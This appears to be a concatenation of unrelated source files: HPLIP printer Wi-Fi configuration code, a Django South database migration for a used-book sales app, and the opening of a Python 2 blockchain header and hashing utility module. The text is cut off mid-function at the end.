                    ip = params['iocfgdyn2:ioconfigdyn-dd3:ioadaptorconfig-dd3:networkadaptorconfig-dd3:ipversionconfig-dd3:ipconfig-dd:ipaddress']
                except:
                    ip = params['iocfgdyn2:ioconfigdyn-dd3:ioadaptorconfig-dd3:networkadaptorconfig-dd3:ipversionconfig-dd3:ipconfig-dd:ipaddress-0']
                #subnetmask = params['io:protocols-io:protocol-io:addresses-io:ipv4addresses-io:ipv4address-dd:subnetmask']
                try:
                    subnetmask = params['iocfgdyn2:ioconfigdyn-dd3:ioadaptorconfig-dd3:networkadaptorconfig-dd3:ipversionconfig-dd3:ipconfig-dd:subnetmask']
                except:
                    subnetmask = params['iocfgdyn2:ioconfigdyn-dd3:ioadaptorconfig-dd3:networkadaptorconfig-dd3:ipversionconfig-dd3:ipconfig-dd:subnetmask-0']
                #gateway = params['io:protocols-io:protocol-io:addresses-io:ipv4addresses-io:ipv4address-dd:defaultgateway']
                try:
                    gateway = params['iocfgdyn2:ioconfigdyn-dd3:ioadaptorconfig-dd3:networkadaptorconfig-dd3:ipversionconfig-dd3:ipconfig-dd:defaultgateway']
                except:
                    gateway = params['iocfgdyn2:ioconfigdyn-dd3:ioadaptorconfig-dd3:networkadaptorconfig-dd3:ipversionconfig-dd3:ipconfig-dd:defaultgateway-0']
                #if 'DHCP' in params['io:protocols-io:protocol-io:addresses-io:ipv4addresses-io:ipv4address-dd:configmethod']:
                try:
                    addressmode = params['iocfgdyn2:ioconfigdyn-dd3:ioadaptorconfig-dd3:networkadaptorconfig-dd3:ipversionconfig-dd3:ipconfig-dd:ipconfigmethod']
                except:
                    addressmode = params['iocfgdyn2:ioconfigdyn-dd3:ioadaptorconfig-dd3:networkadaptorconfig-dd3:ipversionconfig-dd3:ipconfig-dd:ipconfigmethod-0']
                if 'dhcp' in addressmode.lower():
                    addressmode = 'dhcp'
                else:
                    addressmode = 'autoip'
                # DNS extraction is not implemented for the new schema.
                #if elementCount ==1:
                #    pridns = params['io:protocols-io:protocol-dd:dnsserveripaddress']
                #    sec_dns = params['io:protocols-io:protocol-dd:secondarydnsserveripaddress']
                #for a in xrange(elementCount):
                #    if params['io:protocols-io:protocol-dd:dnsserveripaddress-%d' %a] !="::":
                #        pridns = params['io:protocols-io:protocol-dd:dnsserveripaddress-%d' %a]
                #        sec_dns = params['io:protocols-io:protocol-dd:secondarydnsserveripaddress-%d' %a]
                #        break
            except KeyError as e:
                log.error("Missing response key: %s" % str(e))
    log.debug("ip=%s, hostname=%s, addressmode=%s, subnetmask=%s, gateway=%s, pridns=%s, sec_dns=%s"%(ip, hostname, addressmode, subnetmask, gateway, pridns, sec_dns))
    return ip, hostname, addressmode, subnetmask, gateway, pridns, sec_dns
def getCryptoSuite(dev, adapterName):
    """Read the active wifi profile and return (alg, mode, secretid).

    alg is the encryption type, mode the communication mode, secretid the
    BSSID; all are '' when the request or the key lookups fail.
    """
    alg = ''
    mode = ''
    secretid = ''
    URI = LEDM_WIFI_BASE_URI + adapterName + "/Profiles/Active"
    parms, code, elementCount = {}, HTTP_ERROR, 0
    attempt = 0
    while attempt < MAX_RETRIES:
        attempt += 1
        parms, code, elementCount = readXmlDataFromURI(dev, URI, '<io:Profile', '<io:Profile')
        if code == HTTP_OK:
            break
    if code != HTTP_OK:
        log.error("Request Failed With Response Code %d" %code)
        return alg, mode, secretid
    if parms is not None:
        try:
            mode = parms['io:profile-io:adapterprofile-io:wifiprofile-wifi:communicationmode']
            alg = parms['io:profile-io:adapterprofile-io:wifiprofile-wifi:encryptiontype']
            secretid = parms['io:profile-io:adapterprofile-io:wifiprofile-wifi:bssid']
        except KeyError as e:
            log.debug("Missing response key: %s" % str(e))
    return alg, mode, secretid
def associate(dev, adapterName, ssid, communication_mode, encryption_type, key):
    """Push an active wifi profile (SSID/mode/encryption/key) to the device.

    For open networks only the profile is sent; otherwise the passphrase
    block is spliced into the profile XML. Returns {'errorreturn': code}.
    """
    ret,code = {},HTTP_ERROR
    URI = LEDM_WIFI_BASE_URI + adapterName + "/Profiles/Active"
    if encryption_type == 'none':
        authMode = 'open'
        ppXml = passPhraseXml%(binascii.hexlify(to_bytes_utf8(ssid)).decode('utf-8'), communication_mode,encryption_type,authMode)
    else:
        authMode = encryption_type
        # Insert the key block just before </io:WifiProfile>.
        pos = passPhraseXml.find("</io:WifiProfile>",0,len(passPhraseXml))
        ppXml = (passPhraseXml[:pos] + keyInfoXml + passPhraseXml[pos:])%(binascii.hexlify(to_bytes_utf8(ssid)).decode('utf-8'),communication_mode,encryption_type,\
            authMode,binascii.hexlify(to_bytes_utf8(key)).decode('utf-8'))
    code = writeXmlDataToURI(dev,URI,ppXml,10)
    ret['errorreturn'] = code
    # FIX: original tested `not(code == HTTP_OK or HTTP_NOCONTENT)`, which is
    # always False because HTTP_NOCONTENT (204) is truthy -- failures were
    # never logged.
    if code not in (HTTP_OK, HTTP_NOCONTENT):
        log.error("Request Failed With Response Code %d" % ret['errorreturn'])
    return ret
def getVSACodes(dev, adapterName):
    """Fetch wifi diagnostic VSA codes for the adapter.

    Returns a list containing a single (rule, severity) tuple on success,
    with either element '' when absent, or an empty list on HTTP failure.
    """
    ret,params,code,elementCount = [],{},HTTP_ERROR,0
    severity,rule ='',''
    URI = LEDM_WIFI_BASE_URI + adapterName + "/VsaCodes.xml"
    max_tries = 0
    while max_tries < MAX_RETRIES:
        max_tries +=1
        params,code,elementCount = readXmlDataFromURI(dev,URI,"<io:VsaCodes","<io:VsaCodes",10)
        if code == HTTP_OK:
            break
    if code != HTTP_OK:
        log.warn("Request Failed With Response Code %d"%code)
        return ret
    if params is not None:
        try:
            severity= params['io:vsacodes-wifi:vsacode-dd:severity']
        except:
            severity = ""
        try:
            rule = params['io:vsacodes-wifi:vsacode-wifi:rulenumber']
        # except KeyError, e:
        #     log.error("Missing response key: %s" % str(e))
        except:
            rule = ""
        ret.append((rule, severity))
    return ret
def getHostname(dev):
    """Return the device hostname from /IoMgmt/IoConfig.xml, or '' on failure."""
    hostName = ''
    URI = "/IoMgmt/IoConfig.xml"
    for _attempt in range(MAX_RETRIES):
        params, code, elementCount = readXmlDataFromURI(dev, URI, '<io:IoConfig', '<io:IoConfig')
        if code == HTTP_OK:
            break
    if code != HTTP_OK:
        log.warn("Request failed with Response code %d. HostName not found."%code)
        return hostName
    if params is not None:
        try:
            hostName = params['io:ioconfig-io:iodeviceconfig-dd3:hostname']
        except KeyError as e:
            log.debug("Missing response key: %s" % e)
    return hostName
def getSignalStrength(dev, adapterName, ssid, adaptor_id=0):
    """Return (ss_max, ss_min, ss_val, ss_dbm) for the named network.

    Defaults are (5, 0, 0, -200); they are returned unchanged when ssid is
    None or the request fails. Polls while the device answers HTTP 202
    (scan still running).
    """
    ss_max, ss_min, ss_val, ss_dbm = 5, 0, 0, -200
    params,code,elementCount = {},HTTP_ERROR,0
    if ssid is not None:
        URI = LEDM_WIFI_BASE_URI + adapterName + "/WifiNetworks/SSID="+ssid
    else:
        return ss_max, ss_min, ss_val, ss_dbm
    while True:
        params,code,elementCount = readXmlDataFromURI(dev,URI,'<io:WifiNetworks', '<io:WifiNetwork>',10)
        if code == HTTP_ACCEPTED:
            log.info("Got Response as HTTP_ACCEPTED, so retrying to get the actual result")
            continue
        else:
            break
    if code != HTTP_OK:
        log.error("Request Failed With Response Code %d"%code)
        return ss_max, ss_min, ss_val, ss_dbm
    if params is not None:
        # Only the single-match case is handled; multi-entry responses keep
        # the defaults.
        if elementCount == 1:
            try:
                ss_dbm = params['io:wifinetworks-io:wifinetwork-io:signalinfo-wifi:dbm']
                ss_val = params['io:wifinetworks-io:wifinetwork-io:signalinfo-wifi:signalstrength']
            except KeyError as e:
                log.error("Missing response key: %s" % e)
    return ss_max, ss_min, ss_val, ss_dbm
def readXmlTagDataFromURI(dev,URI,xmlRootNode,xmlReqDataNode,timeout=5):
    """HTTP-GET *URI* over the first usable device channel and parse every
    occurrence of *xmlReqDataNode* in the reply.

    Channel preference: LEDM, then EWS_LEDM, then Marvell_EWS.
    Returns (paramsList, http_code) where paramsList holds one flat dict
    per matched element; the list is empty on any failure.
    """
    paramsList,code =[],HTTP_ERROR
    data = format_http_get(URI,0,"")
    log.info(data)
    response = io.BytesIO()
    if dev.openLEDM() == -1:
        dev.closeLEDM()
        if dev.openEWS_LEDM() == -1:
            dev.openMarvell_EWS()
            dev.writeMarvell_EWS(data)
            try:
                while dev.readMarvell_EWS(1024, response, timeout):
                    pass
            except Error:
                dev.closeMarvell_EWS()
                log.error("Unable to read Marvell_EWS Channel")
        else:
            dev.writeEWS_LEDM(data)
            try:
                dev.readLEDMData(dev.readEWS_LEDM, response, timeout)
            except Error:
                dev.closeEWS_LEDM()
                log.error("Unable to read EWS_LEDM Channel")
    else:
        dev.writeLEDM(data)
        try:
            dev.readLEDMData(dev.readLEDM, response, timeout)
        except Error:
            dev.closeLEDM()
            log.error("Unable to read LEDM Channel")
    strResp = response.getvalue().decode('utf-8')
    if strResp is not None:
        code = get_error_code(strResp)
        if code == HTTP_OK:
            strResp = utils.unchunck_xml_data(strResp)
            # Cut everything before the root node, then normalize.
            pos = strResp.find(xmlRootNode,0,len(strResp))
            repstr = strResp[pos:].strip()
            repstr = repstr.replace('\r','').replace('\t','').replace('\n','') # To remove formating characters from the received xml
            repstr = repstr.rstrip('0') # To remove trailing zero from the received xml
            try:
                parser_object = utils.extendedExpat()
                root_element = parser_object.Parse(repstr)
                xmlReqDataNode = ''.join(l for l in filter(lambda x: x not in '<>', xmlReqDataNode)) # [c for c in xmlReqDataNode if c not in "<>"] # To remove '<' and '>' characters
                reqDataElementList = root_element.getElementsByTagName(xmlReqDataNode)
                # Re-serialize each matching element and flatten it to a dict.
                for node in reqDataElementList:
                    repstr = node.toString()
                    repstr = repstr.replace('\r','').replace('\t','').replace('\n','') # To remove formating characters from the received xml
                    params = utils.XMLToDictParser().parseXML(to_bytes_utf8(repstr))
                    paramsList.append(params)
            except xml.parsers.expat.ExpatError as e:
                log.debug("XML parser failed: %s" % e) #changed from error to debug
        else:
            log.debug("HTTP Responce failed with %s code"%code)
    return paramsList,code
def readXmlDataFromURI(dev,URI,xmlRootNode,xmlChildNode,timeout=5):
    """Fetch an XML document from the device and parse it into a dict.

    Same channel-fallback strategy as readXmlTagDataFromURI (LEDM, then
    EWS_LEDM, then Marvell_EWS), but parses the whole subtree starting at
    ``xmlRootNode`` instead of extracting individual elements.

    Returns:
        (params, code, elementCount): parsed dict, HTTP status code
        (HTTP_ERROR on failure), and the number of textual occurrences of
        ``xmlChildNode`` in the cleaned response.
    """
    params,code,elementCount ={},HTTP_ERROR,0
    data = format_http_get(URI,0,"")
    log.info(data)
    response = io.BytesIO()
    # Channel fallback: LEDM -> EWS_LEDM -> Marvell_EWS.
    if dev.openLEDM() == -1:
        dev.closeLEDM()
        if dev.openEWS_LEDM() == -1:
            dev.openMarvell_EWS()
            dev.writeMarvell_EWS(data)
            try:
                while dev.readMarvell_EWS(1024, response, timeout):
                    pass
            except Error:
                dev.closeMarvell_EWS()
                log.error("Unable to read Marvell_EWS Channel")
        else:
            dev.writeEWS_LEDM(data)
            try:
                dev.readLEDMData(dev.readEWS_LEDM, response,timeout)
            except Error:
                dev.closeEWS_LEDM()
                log.error("Unable to read EWS_LEDM Channel")
    else:
        dev.writeLEDM(data)
        try:
            dev.readLEDMData(dev.readLEDM, response,timeout)
        except Error:
            dev.closeLEDM()
            log.error("Unable to read LEDM Channel")
    #dev.closeEWS_LEDM()
    strResp = response.getvalue().decode('utf-8')
    if strResp is not None:
        code = get_error_code(strResp)
        if code == HTTP_OK:
            strResp = utils.unchunck_xml_data(strResp)
            pos = strResp.find(xmlRootNode,0,len(strResp))
            repstr = strResp[pos:].strip()
            repstr = repstr.replace('\r','').replace('\t','').replace('\n','') # To remove formating characters from the received xml
            repstr = repstr.rstrip('0') # To remove trailing zero from the received xml
            # Plain substring count, not a DOM query; counts tag text occurrences.
            elementCount = repstr.count(xmlChildNode)
            try:
                params = utils.XMLToDictParser().parseXML(repstr)
            except xml.parsers.expat.ExpatError as e:
                log.debug("XML parser failed: %s" % e) #changed from error to debug
        else:
            log.debug(" HTTP Responce failed with %s code"%code)
    return params,code,elementCount
def writeXmlDataToURI(dev,URI,xml,timeout=5):
    """HTTP PUT the XML payload ``xml`` to ``URI`` on the device.

    Uses the same channel fallback as the readers (LEDM, then EWS_LEDM,
    then Marvell_EWS) and returns the HTTP status code parsed from the
    device's response (HTTP_ERROR when no usable response was read).
    """
    code = HTTP_ERROR
    data = format_http_put(URI,len(xml),xml)
    response = io.BytesIO()
    if dev.openLEDM() == -1:
        if dev.openEWS_LEDM() == -1:
            dev.openMarvell_EWS()
            dev.writeMarvell_EWS(data)
            try:
                # NOTE(review): reads 1000-byte chunks here vs 1024 in the
                # readers -- presumably intentional, confirm.
                while dev.readMarvell_EWS(1000, response, timeout):
                    pass
            except Error:
                dev.closeMarvell_EWS()
                log.error("Unable to read Marvell_EWS Channel")
        else:
            dev.writeEWS_LEDM(data)
            try:
                dev.readLEDMData(dev.readEWS_LEDM, response, timeout)
            except Error:
                dev.closeEWS_LEDM()
                log.error("Unable to read EWS_LEDM Channel")
    else:
        dev.writeLEDM(data)
        try:
            dev.readLEDMData(dev.readLEDM, response,timeout )
        except Error:
            dev.closeLEDM()
            log.error("Unable to read LEDM Channel")
    strResp = response.getvalue().decode('utf-8')
    if strResp is not None:
        code = get_error_code(strResp)
    return code
def get_error_code(ret):
    """Extract the numeric HTTP status code from a raw response string.

    Returns HTTP_ERROR when the input is empty, does not match the HTTP
    status-line pattern, or carries a non-numeric status code.
    """
    if not ret:
        return HTTP_ERROR
    m = http_result_pat.match(ret)
    if m is None:
        return HTTP_ERROR
    try:
        return int(m.group(1))
    except (ValueError, TypeError):
        return HTTP_ERROR
def format_http_get(requst, ledmlen, xmldata, content_type="text/xml; charset=utf-8"):
    """Build a raw HTTP GET request string for the LEDM channel.

    NOTE(review): `utils.cat` presumably substitutes the ``$name``
    placeholders from this function's local variables (requst, host,
    content_type, ledmlen, xmldata) -- confirm against base.utils; do not
    rename these locals.
    """
    host = 'localhost'
    return utils.cat(
"""GET $requst HTTP/1.1\r
Host: $host\r
User-Agent: hplip/3.0\r
Content-Type: $content_type\r
Content-Length: $ledmlen\r
\r
$xmldata""")
def format_http_put(requst, ledmlen, xmldata, content_type="text/xml; charset=utf-8"):
    """Build a raw HTTP PUT request string carrying ``xmldata``.

    NOTE(review): `utils.cat` presumably substitutes ``$name`` placeholders
    from this function's locals -- confirm against base.utils; do not rename
    these locals.
    """
    host = 'localhost'
    return utils.cat(
"""PUT $requst HTTP/1.1\r
Host: $host\r
User-Agent: hplip/3.0\r
Content-Type: $content_type\r
Content-Length: $ledmlen\r
\r
$xmldata""")
| matrumz/RPi_Custom_Files | Printing/hplip-3.15.2/base/LedmWifi.py | Python | gpl-2.0 | 28,034 |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """Initial South schema migration for the `encefal` app.

    Creates the Vendeur, Session, Facture, Livre and Exemplaire tables.
    Generated code: do not edit the `models` dict by hand -- it is South's
    frozen snapshot of the ORM at generation time.
    """

    def forwards(self, orm):
        # Adding model 'Vendeur'
        db.create_table(u'encefal_vendeur', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('actif', self.gf('django.db.models.fields.BooleanField')(default=True)),
            ('date_creation', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('date_modification', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
            ('nom', self.gf('django.db.models.fields.CharField')(max_length=255)),
            ('prenom', self.gf('django.db.models.fields.CharField')(max_length=255)),
            ('code_permanent', self.gf('django.db.models.fields.CharField')(max_length=12)),
            ('email', self.gf('django.db.models.fields.EmailField')(max_length=255)),
            ('telephone', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
        ))
        db.send_create_signal(u'encefal', ['Vendeur'])

        # Adding model 'Session'
        db.create_table(u'encefal_session', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('actif', self.gf('django.db.models.fields.BooleanField')(default=True)),
            ('date_creation', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('date_modification', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
            ('nom', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255)),
            ('date_debut', self.gf('django.db.models.fields.DateField')()),
            ('date_fin', self.gf('django.db.models.fields.DateField')()),
        ))
        db.send_create_signal(u'encefal', ['Session'])

        # Adding model 'Facture'
        db.create_table(u'encefal_facture', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('actif', self.gf('django.db.models.fields.BooleanField')(default=True)),
            ('date_creation', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('date_modification', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
            ('employe', self.gf('django.db.models.fields.related.ForeignKey')(related_name='factures', blank=True, db_column='employe', to=orm['auth.User'])),
            ('session', self.gf('django.db.models.fields.related.ForeignKey')(related_name='factures', blank=True, db_column='session', to=orm['encefal.Session'])),
        ))
        db.send_create_signal(u'encefal', ['Facture'])

        # Adding model 'Livre'
        db.create_table(u'encefal_livre', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('actif', self.gf('django.db.models.fields.BooleanField')(default=True)),
            ('date_creation', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('date_modification', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
            ('isbn', self.gf('django.db.models.fields.CharField')(max_length=13, blank=True)),
            ('titre', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
            ('auteur', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
            ('edition', self.gf('django.db.models.fields.PositiveIntegerField')(default=1, blank=True)),
        ))
        db.send_create_signal(u'encefal', ['Livre'])

        # Adding model 'Exemplaire'
        db.create_table(u'encefal_exemplaire', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('actif', self.gf('django.db.models.fields.BooleanField')(default=True)),
            ('date_creation', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('date_modification', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
            ('facture', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='exemplaires', null=True, db_column='facture', to=orm['encefal.Facture'])),
            ('livre', self.gf('django.db.models.fields.related.ForeignKey')(related_name='exemplaires', db_column='livre', to=orm['encefal.Livre'])),
            ('vendeur', self.gf('django.db.models.fields.related.ForeignKey')(related_name='exemplaires', db_column='vendeur', to=orm['encefal.Vendeur'])),
            ('etat', self.gf('django.db.models.fields.CharField')(default='VENT', max_length=4)),
            ('prix', self.gf('django.db.models.fields.IntegerField')()),
        ))
        db.send_create_signal(u'encefal', ['Exemplaire'])

    def backwards(self, orm):
        # Deleting model 'Vendeur'
        db.delete_table(u'encefal_vendeur')

        # Deleting model 'Session'
        db.delete_table(u'encefal_session')

        # Deleting model 'Facture'
        db.delete_table(u'encefal_facture')

        # Deleting model 'Livre'
        db.delete_table(u'encefal_livre')

        # Deleting model 'Exemplaire'
        db.delete_table(u'encefal_exemplaire')

    # Frozen ORM snapshot used by South to materialize `orm[...]` above.
    models = {
        u'auth.group': {
            'Meta': {'object_name': 'Group'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        u'auth.permission': {
            'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        u'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        u'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        u'encefal.exemplaire': {
            'Meta': {'object_name': 'Exemplaire'},
            'actif': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'date_creation': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'date_modification': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'etat': ('django.db.models.fields.CharField', [], {'default': "'VENT'", 'max_length': '4'}),
            'facture': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'exemplaires'", 'null': 'True', 'db_column': "'facture'", 'to': u"orm['encefal.Facture']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'livre': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'exemplaires'", 'db_column': "'livre'", 'to': u"orm['encefal.Livre']"}),
            'prix': ('django.db.models.fields.IntegerField', [], {}),
            'vendeur': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'exemplaires'", 'db_column': "'vendeur'", 'to': u"orm['encefal.Vendeur']"})
        },
        u'encefal.facture': {
            'Meta': {'object_name': 'Facture'},
            'actif': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'date_creation': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'date_modification': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'employe': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'factures'", 'blank': 'True', 'db_column': "'employe'", 'to': u"orm['auth.User']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'session': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'factures'", 'blank': 'True', 'db_column': "'session'", 'to': u"orm['encefal.Session']"})
        },
        u'encefal.livre': {
            'Meta': {'object_name': 'Livre'},
            'actif': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'auteur': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'date_creation': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'date_modification': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'edition': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'isbn': ('django.db.models.fields.CharField', [], {'max_length': '13', 'blank': 'True'}),
            'titre': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'vendeur': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'livres'", 'symmetrical': 'False', 'through': u"orm['encefal.Exemplaire']", 'db_column': "'vendeur'", 'to': u"orm['encefal.Vendeur']"})
        },
        u'encefal.session': {
            'Meta': {'object_name': 'Session'},
            'actif': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'date_creation': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'date_debut': ('django.db.models.fields.DateField', [], {}),
            'date_fin': ('django.db.models.fields.DateField', [], {}),
            'date_modification': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'nom': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
        },
        u'encefal.vendeur': {
            'Meta': {'object_name': 'Vendeur'},
            'actif': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'code_permanent': ('django.db.models.fields.CharField', [], {'max_length': '12'}),
            'date_creation': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'date_modification': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '255'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'nom': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'prenom': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'telephone': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
        }
    }

    complete_apps = ['encefal']
#!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from itertools import imap
import threading
import time
import hashlib
import struct
# Base58 alphabet (Bitcoin family: omits 0, O, I, l to avoid visual ambiguity).
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)
# NOTE(review): `global` at module scope is a no-op; these are ordinary
# module attributes. 48 / 5 are Litecoin's address version bytes.
global PUBKEY_ADDRESS
global SCRIPT_ADDRESS
PUBKEY_ADDRESS = 48
SCRIPT_ADDRESS = 5
def rev_hex(s):
    # Reverse the byte order of a hex string (Python 2 only: relies on the
    # str 'hex' codec, which was removed in Python 3).
    return s.decode('hex')[::-1].encode('hex')
# Double SHA-256, the standard Bitcoin-family hash function.
Hash = lambda x: hashlib.sha256(hashlib.sha256(x).digest()).digest()
# Hashes are displayed big-endian but stored little-endian; these flip the
# byte order while converting to/from hex (Python 2 str codecs).
hash_encode = lambda x: x[::-1].encode('hex')
hash_decode = lambda x: x.decode('hex')[::-1]
def header_to_string(res):
    """Serialize a block-header dict to its 160-hex-char wire representation."""
    pbh = res.get('prev_block_hash')
    if pbh is None:
        # Genesis block: no previous block hash.
        pbh = '0'*64
    return int_to_hex4(res.get('version')) \
        + rev_hex(pbh) \
        + rev_hex(res.get('merkle_root')) \
        + int_to_hex4(int(res.get('timestamp'))) \
        + int_to_hex4(int(res.get('bits'))) \
        + int_to_hex4(int(res.get('nonce')))
# Pre-compiled little-endian converters for 4-byte (L) and 8-byte (Q) ints.
_unpack_bytes4_to_int = struct.Struct("<L").unpack
_unpack_bytes8_to_int = struct.Struct("<Q").unpack
def bytes4_to_int(s):
    # 4 little-endian bytes -> int
    return _unpack_bytes4_to_int(s)[0]
def bytes8_to_int(s):
    # 8 little-endian bytes -> int
    return _unpack_bytes8_to_int(s)[0]
int_to_bytes4 = struct.Struct('<L').pack
int_to_bytes8 = struct.Struct('<Q').pack
def int_to_hex4(i):
    # int -> 8 hex chars, little-endian (Python 2 'hex' codec).
    return int_to_bytes4(i).encode('hex')
def int_to_hex8(i):
    # int -> 16 hex chars, little-endian (Python 2 'hex' codec).
    return int_to_bytes8(i).encode('hex')
def header_from_string(s):
    """Parse an 80-byte serialized block header into its component dict."""
    return {
        'version': bytes4_to_int(s[0:4]),
        'prev_block_hash': hash_encode(s[4:36]),
        'merkle_root': hash_encode(s[36:68]),
        'timestamp': bytes4_to_int(s[68:72]),
        'bits': bytes4_to_int(s[72:76]),
